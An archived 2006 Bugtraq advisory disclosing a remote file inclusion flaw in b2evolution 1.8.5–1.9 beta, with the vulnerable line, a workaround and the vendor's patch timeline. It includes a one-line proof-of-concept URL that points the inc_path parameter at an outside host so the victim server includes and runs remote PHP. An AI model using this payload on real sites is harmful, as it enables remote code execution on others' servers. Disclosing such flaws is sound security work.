lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061128193529.18202.qmail@securityfocus.com>
Date: 28 Nov 2006 19:35:29 -0000
From: tarkus@...fp.org
To: bugtraq@...urityfocus.com
Subject: b2evolution Remote File inclusion Vulnerability

_________________________________________
_________________________________________

  Severity: High
  Title: b2evolution Remote File inclusion Vulnerability
  Date: 28.11.06
  Author: tarkus (tarkus (at) tiifp (dot) org)
  Web: https://tiifp.org/tarkus
  Vendor: b2evolution (http://b2evolution.net/)
  Affected Product(s): b2evolution 1.8.5 - 1.9 beta
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Description:
------------

Line 67 of import-mt.php (blogs/inc/CONTROL/imports):

>
>require_once $inc_path.'MODEL/files/_file.funcs.php';
>



PoC:
----

http://<victim>/<b2epath>/inc/CONTROL/import/import-mt.php?basepath= \
foo&inc_path=https://tiifp.org/tarkus/PoC/

register_globals and allow_url_fopen have to be On


Workaround:
-----------

Put the following line at the beginning of the file.

if( !defined('EVO_MAIN_INIT') ) die( 'Please, do not access this page \
directly.' );



Vendor Response:
----------------

Reported to Vendor:     10.11.06
Vendor response:        10.11.06
Patch in CVS:           10.11.06

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ